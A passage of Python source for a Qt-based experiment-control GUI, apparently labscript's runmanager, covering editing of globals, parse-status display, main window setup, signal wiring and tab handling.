item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be outer producted with other lists to form a larger parameter space.')
elif new_expansion:
item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be iterated over in lock-step with other globals in the ' +
'\'%s\' zip group.' % new_expansion)
else:
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('This global will be interpreted as a single value and passed to compilation as-is.')
# Ensure the value actually changed, rather than something else about
# the item:
if new_expansion != previous_expansion:
self.change_global_expansion(global_name, previous_expansion, new_expansion)
def on_tableView_globals_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_globals_set_selected_true)
menu.addAction(self.action_globals_set_selected_false)
menu.addAction(self.action_globals_delete_selected)
menu.exec_(QtGui.QCursor.pos())
def on_globals_delete_selected_triggered(self):
selected_indexes = self.ui.tableView_globals.selectedIndexes()
selected_items = (self.globals_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_NAME]
# If multiple selected, show a 'delete n globals?' message. Otherwise,
# pass confirm=True to self.delete_global so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d globals?" % len(name_items)):
return
for item in name_items:
global_name = item.text()
self.delete_global(global_name, confirm=not confirm_multiple)
def on_globals_set_selected_bools_triggered(self, state):
selected_indexes = self.ui.tableView_globals.selectedIndexes()
selected_items = [self.globals_model.itemFromIndex(index) for index in selected_indexes]
value_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_VALUE]
units_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_UNITS]
for value_item, units_item in zip(value_items, units_items):
if units_item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item.setText(state)
def close(self):
# It is up to the main runmanager class to drop references to this
# instance before or after calling this method, so that after the
# tabWidget no longer owns our widgets, both the widgets and the
# instance will be garbage collected.
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.removeTab(index)
def get_global_item_by_name(self, global_name, column, previous_name=None):
"""Returns an item from the row representing a global in the globals model.
Which item is returned is set by the column argument."""
possible_name_items = self.globals_model.findItems(global_name, column=self.GLOBALS_COL_NAME)
if previous_name is not None:
# Filter by previous name, useful for telling rows apart when a
# rename is in progress and two rows may temporarily contain the
# same name (though the rename code will throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) == previous_name]
elif global_name != self.GLOBALS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new global is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.globals_model.itemFromIndex(item_index)
return item
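# Illustrative usage (added for clarity; 'my_global' is a hypothetical global
# name): a GroupTab method can fetch the value cell for a named global and
# edit it programmatically:
#
#     value_item = self.get_global_item_by_name('my_global', self.GLOBALS_COL_VALUE)
#     value_item.setText('1.5')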
def do_model_sort(self):
header = self.ui.tableView_globals.horizontalHeader()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.tableView_globals.sortByColumn(sort_column, sort_order)
def new_global(self, global_name):
logger.info('%s:%s - new global: %s', self.globals_file, self.group_name, global_name)
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME,
previous_name=self.GLOBALS_DUMMY_ROW_TEXT)
try:
runmanager.new_global(self.globals_file, self.group_name, global_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created global into the model:
global_row = self.make_global_row(global_name)
last_index = self.globals_model.rowCount()
# Insert it as the row before the last (dummy) row:
self.globals_model.insertRow(last_index - 1, global_row)
self.do_model_sort()
# Go into edit mode on the 'value' item:
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE,
previous_name=global_name)
value_item_index = value_item.index()
self.ui.tableView_globals.setCurrentIndex(value_item_index)
self.ui.tableView_globals.edit(value_item_index)
self.globals_changed()
finally:
# Set the dummy row's text back ready for another global to be created:
item.setText(self.GLOBALS_DUMMY_ROW_TEXT)
def rename_global(self, previous_global_name, new_global_name):
logger.info('%s:%s - rename global: %s -> %s',
self.globals_file, self.group_name, previous_global_name, new_global_name)
item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_NAME,
previous_name=previous_global_name)
try:
runmanager.rename_global(self.globals_file, self.group_name, previous_global_name, new_global_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_global_name)
else:
item.setData(new_global_name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_global_name, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
item.setToolTip(new_global_name)
self.globals_changed()
value_item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_VALUE)
value = value_item.text()
if not value and self.ui.tableView_globals.state() != QtWidgets.QAbstractItemView.EditingState:
# Go into editing the value item automatically if not already in edit mode:
value_item_index = value_item.index()
self.ui.tableView_globals.setCurrentIndex(value_item_index)
self.ui.tableView_globals.edit(value_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def change_global_value(self, global_name, previous_value, new_value, interactive=True):
logger.info('%s:%s - change global value: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_value, new_value))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if not interactive:
# Value was not set interactively by the user, it is up to us to set it:
with self.globals_model_item_changed_disconnected:
item.setText(new_value)
previous_background = item.background()
previous_icon = item.icon()
item.setData(new_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(None, QtCore.Qt.BackgroundRole)
item.setIcon(QtGui.QIcon(':qtutils/fugue/hourglass'))
args = global_name, previous_value, new_value, item, previous_background, previous_icon
if interactive:
QtCore.QTimer.singleShot(1, lambda: self.complete_change_global_value(*args))
else:
self.complete_change_global_value(*args, interactive=False)
def complete_change_global_value(self, global_name, previous_value, new_value, item, previous_background, previous_icon, interactive=True):
try:
runmanager.set_value(self.globals_file, self.group_name, global_name, new_value)
except Exception as e:
if interactive:
error_dialog(str(e))
# Set the item text back to the old name, since the change failed:
with self.globals_model_item_changed_disconnected:
item.setText(previous_value)
item.setData(previous_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(previous_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(previous_background, QtCore.Qt.BackgroundRole)
item.setIcon(previous_icon)
if not interactive:
raise
else:
self.check_for_boolean_values(item)
self.do_model_sort()
item.setToolTip('Evaluating...')
self.globals_changed()
if not interactive:
return
units_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
units = units_item.text()
if not units and self.ui.tableView_globals.state() != QtWidgets.QAbstractItemView.EditingState:
# Go into editing the units item automatically if not already in edit mode:
units_item_index = units_item.index()
self.ui.tableView_globals.setCurrentIndex(units_item_index)
self.ui.tableView_globals.edit(units_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def change_global_units(self, global_name, previous_units, new_units):
logger.info('%s:%s - change units: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_units, new_units))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
try:
runmanager.set_units(self.globals_file, self.group_name, global_name, new_units)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_units)
else:
item.setData(new_units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_units, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def change_global_expansion(self, global_name, previous_expansion, new_expansion):
logger.info('%s:%s - change expansion: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_expansion, new_expansion))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
try:
runmanager.set_expansion(self.globals_file, self.group_name, global_name, new_expansion)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_expansion)
else:
item.setData(new_expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_expansion, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
self.globals_changed()
# If this changed the sort order, ensure the item is still visible:
scroll_view_to_row_if_current(self.ui.tableView_globals, item)
def check_for_boolean_values(self, item):
"""Checks if the value is 'True' or 'False'. If either, makes the
units cell checkable, uneditable, and coloured to indicate the state.
The units cell can then be clicked to toggle the value."""
index = item.index()
value = item.text()
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
units_index = index.sibling(index.row(), self.GLOBALS_COL_UNITS)
name_item = self.globals_model.itemFromIndex(name_index)
units_item = self.globals_model.itemFromIndex(units_index)
global_name = name_item.text()
logger.debug('%s:%s - check for boolean values: %s' %
(self.globals_file, self.group_name, global_name))
if value == 'True':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!1', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Checked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_ON)))
elif value == 'False':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!0', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Unchecked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_OFF)))
else:
was_bool = units_item.data(self.GLOBALS_ROLE_IS_BOOL)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
units_item.setEditable(True)
# Checkbox still visible unless we do the following:
units_item.setData(None, QtCore.Qt.CheckStateRole)
units_item.setData(None, QtCore.Qt.BackgroundRole)
if was_bool:
# If the item was a bool and now isn't, clear the
# units and go into editing so the user can enter a
# new units string:
units_item.setText('')
self.ui.tableView_globals.setCurrentIndex(units_item.index())
self.ui.tableView_globals.edit(units_item.index())
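# Note (added for clarity): once the units cell is flagged with
# GLOBALS_ROLE_IS_BOOL here, a left click on it is handled by
# on_tableView_globals_leftClicked above, which simply toggles the value item
# between 'True' and 'False'.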
def globals_changed(self):
"""Called whenever something about a global has changed. call
app.globals_changed to inform the main application that it needs to
parse globals again. self.update_parse_indication will be called by
the main app when parsing is done, and will set the colours and
tooltips appropriately"""
# Tell the main app about it:
app.globals_changed()
def delete_global(self, global_name, confirm=True):
logger.info('%s:%s - delete global: %s' %
(self.globals_file, self.group_name, global_name))
if confirm:
if not question_dialog("Delete the global '%s'?" % global_name):
return
runmanager.delete_global(self.globals_file, self.group_name, global_name)
# Find the entry for this global in self.globals_model and remove it:
name_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME)
self.globals_model.removeRow(name_item.row())
self.globals_changed()
def update_parse_indication(self, active_groups, sequence_globals, evaled_globals):
# Check that we are an active group:
if self.group_name in active_groups and active_groups[self.group_name] == self.globals_file:
self.tab_contains_errors = False
# for global_name, value in evaled_globals[self.group_name].items():
for i in range(self.globals_model.rowCount()):
name_item = self.globals_model.item(i, self.GLOBALS_COL_NAME)
if name_item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
value_item = self.globals_model.item(i, self.GLOBALS_COL_VALUE)
expansion_item = self.globals_model.item(i, self.GLOBALS_COL_EXPANSION)
# value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
# expansion_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
global_name = name_item.text()
value = evaled_globals[self.group_name][global_name]
ignore, ignore, expansion = sequence_globals[self.group_name][global_name]
# Temporarily disconnect the item_changed signal on the model
# so that we can set the expansion type without triggering
# another preparse - the parsing has already been done with
# the new expansion type.
with self.globals_model_item_changed_disconnected:
if expansion_item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) != expansion:
# logger.info('expansion previous text set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
if expansion_item.data(self.GLOBALS_ROLE_SORT_DATA) != expansion:
# logger.info('sort data role set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
# The next line will now trigger item_changed, but it will not
# be detected as an actual change to the expansion type,
# because previous_text will match text. So it will not look
# like a change and will not trigger preparsing. However, it is
# still important that other triggers be processed, such as
# setting the icon in the expansion item, so that will still
# occur in the callback.
expansion_item.setText(expansion)
if isinstance(value, Exception):
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_ERROR)))
value_item.setIcon(QtGui.QIcon(':qtutils/fugue/exclamation'))
tooltip = '%s: %s' % (value.__class__.__name__, str(value))
self.tab_contains_errors = True
else:
if value_item.background().color().name().lower() != self.COLOR_OK.lower():
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_OK)))
if not value_item.icon().isNull():
# logger.info('clearing icon')
value_item.setData(None, QtCore.Qt.DecorationRole)
tooltip = repr(value)
if value_item.toolTip() != tooltip:
# logger.info('tooltip_changed')
value_item.setToolTip(tooltip)
if self.tab_contains_errors:
self.set_tab_icon(':qtutils/fugue/exclamation')
else:
self.set_tab_icon(None)
else:
# Clear everything:
self.set_tab_icon(None)
for row in range(self.globals_model.rowCount()):
item = self.globals_model.item(row, self.GLOBALS_COL_VALUE)
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('Group inactive')
item.setData(None, QtCore.Qt.BackgroundRole)
class RunmanagerMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
def closeEvent(self, event):
if app.on_close_event():
return QtWidgets.QMainWindow.closeEvent(self, event)
else:
event.ignore()
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class PoppedOutOutputBoxWindow(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def closeEvent(self, event):
app.on_output_popout_button_clicked()
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunManager(object):
# Constants for the model in the axes tab:
AXES_COL_NAME = 0
AXES_COL_LENGTH = 1
AXES_COL_SHUFFLE = 2
AXES_ROLE_NAME = QtCore.Qt.UserRole + 1
# Constants for the model in the groups tab:
GROUPS_COL_NAME = 0
GROUPS_COL_ACTIVE = 1
GROUPS_COL_DELETE = 2
GROUPS_COL_OPENCLOSE = 3
GROUPS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GROUPS_ROLE_PREVIOUS_NAME = QtCore.Qt.UserRole + 2
GROUPS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 3
GROUPS_ROLE_GROUP_IS_OPEN = QtCore.Qt.UserRole + 4
GROUPS_DUMMY_ROW_TEXT = '<Click to add group>'
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
loader.registerCustomWidget(FingerTabWidget)
loader.registerCustomWidget(TreeView)
self.ui = loader.load('main.ui', RunmanagerMainWindow())
self.output_box = OutputBox(self.ui.verticalLayout_output_tab)
# Add a 'pop-out' button to the output tab:
output_tab_index = self.ui.tabWidget.indexOf(self.ui.tab_output)
self.output_popout_button = TabToolButton(self.ui.tabWidget.parent())
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
self.output_popout_button.setToolTip('Toggle whether the output box is in a separate window')
self.ui.tabWidget.tabBar().setTabButton(output_tab_index, QtWidgets.QTabBar.RightSide, self.output_popout_button)
# Fix the first three tabs in place:
for index in range(3):
self.ui.tabWidget.tabBar().setMovable(False, index=index)
# Whether or not the output box is currently popped out:
self.output_box_is_popped_out = False
# The window it will be moved to when popped out:
self.output_box_window = PoppedOutOutputBoxWindow(self.ui, QtCore.Qt.WindowSystemMenuHint)
self.output_box_window_verticalLayout = QtWidgets.QVBoxLayout(self.output_box_window)
self.output_box_window_verticalLayout.setContentsMargins(0, 0, 0, 0)
self.output_box_window.setWindowTitle('runmanager output')
self.output_box_window.resize(800, 1000)
self.setup_config()
self.setup_axes_tab()
self.setup_groups_tab()
self.connect_signals()
# The last location from which a labscript file was selected, defaults
# to labscriptlib:
self.last_opened_labscript_folder = self.exp_config.get('paths', 'labscriptlib')
# The last location from which a globals file was selected, defaults
# to experiment_shot_storage:
self.last_opened_globals_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# The last file to which the user saved or loaded a configuration:
self.last_save_config_file = None
# The last manually selected shot output folder, defaults to
# experiment_shot_storage:
self.last_selected_shot_output_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.shared_drive_prefix = self.exp_config.get('paths', 'shared_drive')
self.experiment_shot_storage = self.exp_config.get('paths', 'experiment_shot_storage')
# Store the currently open groups as {(globals_filename, group_name): GroupTab}
self.currently_open_groups = {}
# A thread that will evaluate globals when they change, allowing us to
# show their values and any errors in the tabs they came from.
self.preparse_globals_thread = threading.Thread(target=self.preparse_globals_loop)
self.preparse_globals_thread.daemon = True
# A Queue for informing the preparser thread when globals have changed, and thus
# need parsing again. It is a queue rather than a threading.Event() so that
# callers can call Queue.join() to wait for parsing to complete in a race-free
# way
self.preparse_globals_required = queue.Queue()
self.preparse_globals_thread.start()
# A flag telling the compilation thread to abort:
self.compilation_aborted = threading.Event()
# A few attributes for self.guess_expansion_modes() to keep track of
# its state, and thus detect changes:
self.previous_evaled_globals = {}
self.previous_global_hierarchy = {}
self.previous_expansion_types = {}
self.previous_expansions = {}
# The prospective number of shots resulting from compilation
self.n_shots = None
# Start the loop that allows compilations to be queued up:
self.compile_queue = queue.Queue()
self.compile_queue_thread = threading.Thread(target=self.compile_loop)
self.compile_queue_thread.daemon = True
self.compile_queue_thread.start()
splash.update_text('starting compiler subprocess')
# Start the compiler subprocess:
self.to_child, self.from_child, self.child = process_tree.subprocess(
'batch_compiler.py', output_redirection_port=self.output_box.port
)
# Is blank until a labscript file is selected:
self.previous_default_output_folder = ''
# Start a thread to monitor the time of day and create new shot output
# folders for each day:
inthread(self.rollover_shot_output_folder)
self.non_default_folder = None
# The data from the last time we saved the configuration, so we can
# know if something's changed:
self.last_save_data = None
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('runmanager', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Defer this until 50ms after the window has shown,
# so that the GUI pops up faster in the meantime
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
splash.update_text('done')
self.ui.show()
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
],
"ports": ['BLACS', 'runviewer'],
"paths": ["shared_drive",
"experiment_shot_storage",
"labscriptlib",
],
}
self.exp_config = LabConfig(required_params = required_config_params)
def setup_axes_tab(self):
self.axes_model = QtGui.QStandardItemModel()
# Setup the model columns and link to the treeview
name_header_item = QtGui.QStandardItem('Name')
name_header_item.setToolTip('The name of the global or zip group being iterated over')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_NAME, name_header_item)
length_header_item = QtGui.QStandardItem('Length')
length_header_item.setToolTip('The number of elements in the axis of the parameter space')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_LENGTH, length_header_item)
shuffle_header_item = QtGui.QStandardItem('Shuffle')
shuffle_header_item.setToolTip('Whether or not the order of the axis should be randomised')
shuffle_header_item.setIcon(QtGui.QIcon(':qtutils/fugue/arrow-switch'))
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_SHUFFLE, shuffle_header_item)
self.ui.treeView_axes.setModel(self.axes_model)
# Setup stuff for a custom context menu:
self.ui.treeView_axes.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_axes_check_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box'),
'Check selected', self.ui)
self.action_axes_uncheck_selected = QtWidgets.QAction(QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'),
'Uncheck selected', self.ui)
# setup header widths
self.ui.treeView_axes.header().setStretchLastSection(False)
self.ui.treeView_axes.header().setSectionResizeMode(self.AXES_COL_NAME, QtWidgets.QHeaderView.Stretch)
def setup_groups_tab(self):
self.groups_model = QtGui.QStandardItemModel()
self.groups_model.setHorizontalHeaderLabels(['File/group name', 'Active', 'Delete', 'Open/Close'])
self.groups_model.setSortRole(self.GROUPS_ROLE_SORT_DATA)
self.ui.treeView_groups.setModel(self.groups_model)
self.ui.treeView_groups.setAnimated(True) # Pretty
self.ui.treeView_groups.setSelectionMode(QtWidgets.QTreeView.ExtendedSelection)
self.ui.treeView_groups.setSortingEnabled(True)
self.ui.treeView_groups.sortByColumn(self.GROUPS_COL_NAME, QtCore.Qt.AscendingOrder)
# Set column widths:
self.ui.treeView_groups.setColumnWidth(self.GROUPS_COL_NAME, 400)
# Make it so the user can just start typing on an item to edit:
self.ui.treeView_groups.setEditTriggers(QtWidgets.QTreeView.AnyKeyPressed |
QtWidgets.QTreeView.EditKeyPressed |
QtWidgets.QTreeView.SelectedClicked)
# Ensure the clickable region of the open/close button doesn't extend forever:
self.ui.treeView_groups.header().setStretchLastSection(False)
# Stretch the filepath/groupname column to fill available space:
self.ui.treeView_groups.header().setSectionResizeMode(
self.GROUPS_COL_NAME, QtWidgets.QHeaderView.Stretch
)
# Shrink columns other than the 'name' column to the size of their headers:
for column in range(self.groups_model.columnCount()):
if column != self.GROUPS_COL_NAME:
self.ui.treeView_groups.resizeColumnToContents(column)
self.ui.treeView_groups.setTextElideMode(QtCore.Qt.ElideMiddle)
# Setup stuff for a custom context menu:
self.ui.treeView_groups.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_groups_set_selection_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected group(s) active', self.ui)
self.action_groups_set_selection_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected group(s) inactive', self.ui)
self.action_groups_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected group(s)', self.ui)
self.action_groups_open_selected = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/plus'), 'Open selected group(s)', self.ui)
self.action_groups_close_selected_groups = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected group(s)', self.ui)
self.action_groups_close_selected_files = QtWidgets.QAction(
QtGui.QIcon(':/qtutils/fugue/cross'), 'Close selected file(s)', self.ui)
# A counter for keeping track of the recursion depth of
# self._groups_model_active_changed(). This is used so that some
# actions can be taken in response to initial data changes, but not to
# flow-on changes made by the method itself:
self.on_groups_model_active_changed_recursion_depth = 0
def connect_signals(self):
# The button that pops the output box in and out:
self.output_popout_button.clicked.connect(self.on_output_popout_button_clicked)
# The menu items:
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionQuit.triggered.connect(self.ui.close)
# labscript file and folder selection stuff:
self.ui.toolButton_select_labscript_file.clicked.connect(self.on_select_labscript_file_clicked)
self.ui.toolButton_select_shot_output_folder.clicked.connect(self.on_select_shot_output_folder_clicked)
self.ui.toolButton_edit_labscript_file.clicked.connect(self.on_edit_labscript_file_clicked)
self.ui.toolButton_reset_shot_output_folder.clicked.connect(self.on_reset_shot_output_folder_clicked)
self.ui.lineEdit_labscript_file.textChanged.connect(self.on_labscript_file_text_changed)
self.ui.lineEdit_shot_output_folder.textChanged.connect(self.on_shot_output_folder_text_changed)
# Control buttons; engage, abort, restart subprocess:
self.ui.pushButton_engage.clicked.connect(self.on_engage_clicked)
self.ui.pushButton_abort.clicked.connect(self.on_abort_clicked)
self.ui.pushButton_restart_subprocess.clicked.connect(self.on_restart_subprocess_clicked)
# shuffle master control
self.ui.pushButton_shuffle.stateChanged.connect(self.on_master_shuffle_clicked)
# Tab closebutton clicked:
self.ui.tabWidget.tabCloseRequested.connect(self.on_tabCloseRequested)
# Axes tab; right click menu, menu actions, reordering
# self.ui.treeView_axes.customContextMenuRequested.connect(self.on_treeView_axes_context_menu_requested)
self.action_axes_check_selected.triggered.connect(self.on_axes_check_selected_triggered)
self.action_axes_uncheck_selected.triggered.connect(self.on_axes_uncheck_selected_triggered)
self.ui.toolButton_axis_to_top.clicked.connect(self.on_axis_to_top_clicked)
self.ui.toolButton_axis_up.clicked.connect(self.on_axis_up_clicked)
self.ui.toolButton_axis_down.clicked.connect(self.on_axis_down_clicked)
self.ui.toolButton_axis_to_bottom.clicked.connect(self.on_axis_to_bottom_clicked)
# axes tab item changed handler
self.axes_model.itemChanged.connect(self.on_axes_item_changed)
self.axes_model.rowsRemoved.connect(self.update_global_shuffle_state)
self.axes_model.rowsInserted.connect(self.update_global_shuffle_state)
# Groups tab; right click menu, menu actions, open globals file, new globals file, diff globals file,
self.ui.treeView_groups.customContextMenuRequested.connect(self.on_treeView_groups_context_menu_requested)
self.action_groups_set_selection_active.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Checked))
self.action_groups_set_selection_inactive.triggered.connect(
lambda: self.on_groups_set_selection_active_triggered(QtCore.Qt.Unchecked))
self.action_groups_delete_selected.triggered.connect(self.on_groups_delete_selected_triggered)
self.action_groups_open_selected.triggered.connect(self.on_groups_open_selected_triggered)
self.action_groups_close_selected_groups.triggered.connect(self.on_groups_close_selected_groups_triggered)
self.action_groups_close_selected_files.triggered.connect(self.on_groups_close_selected_files_triggered)
self.ui.pushButton_open_globals_file.clicked.connect(self.on_open_globals_file_clicked)
self.ui.pushButton_new_globals_file.clicked.connect(self.on_new_globals_file_clicked)
self.ui.pushButton_diff_globals_file.clicked.connect(self.on_diff_globals_file_clicked)
self.ui.treeView_groups.leftClicked.connect(self.on_treeView_groups_leftClicked)
self.ui.treeView_groups.doubleLeftClicked.connect(self.on_treeView_groups_doubleLeftClicked)
self.groups_model.itemChanged.connect(self.on_groups_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.groups_model_item_changed_disconnected = DisconnectContextManager(
self.groups_model.itemChanged, self.on_groups_model_item_changed)
# Keyboard shortcuts:
engage_shortcut = QtWidgets.QShortcut('F5', self.ui,
lambda: self.ui.pushButton_engage.clicked.emit(False))
engage_shortcut.setAutoRepeat(False)
QtWidgets.QShortcut('ctrl+W', self.ui, self.close_current_tab)
QtWidgets.QShortcut('ctrl+Tab', self.ui, lambda: self.switch_tabs(+1))
QtWidgets.QShortcut('ctrl+shift+Tab', self.ui, lambda: self.switch_tabs(-1))
# Tell Windows how to handle our windows in the taskbar, making pinning work properly:
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.output_box_window.newWindow.connect(set_win_appusermodel)
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit runmanager', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
self.to_child.put(['quit', None])
return True
def close_current_tab(self):
current_tab_widget = self.ui.tabWidget.currentWidget()
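# Find the open group tab whose page is the currently displayed widget, and
# close that group: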
for (globals_file, group_name), tab in self.currently_open_groups.items():
if tab.ui is current_tab_widget:
self.close_group(globals_file, group_name)
# close_group modifies currently_open_groups, so stop iterating:
break
def switch_tabs(self, change):
current_index = self.ui.tabWidget.currentIndex()
n_tabs = self.ui.tabWidget.count()
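# Move forward or back by 'change' tabs, wrapping around at the ends: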
new_index = (current_index + change) % n_tabs
self.ui.tabWidget.setCurrentIndex(new_index)
def on_output_popout_button_clicked(self):
if self.output_box_is_popped_out:
self.ui.verticalLayout_output_tab.addWidget(self.output_box.output_textedit)
self.output_box_window.hide()
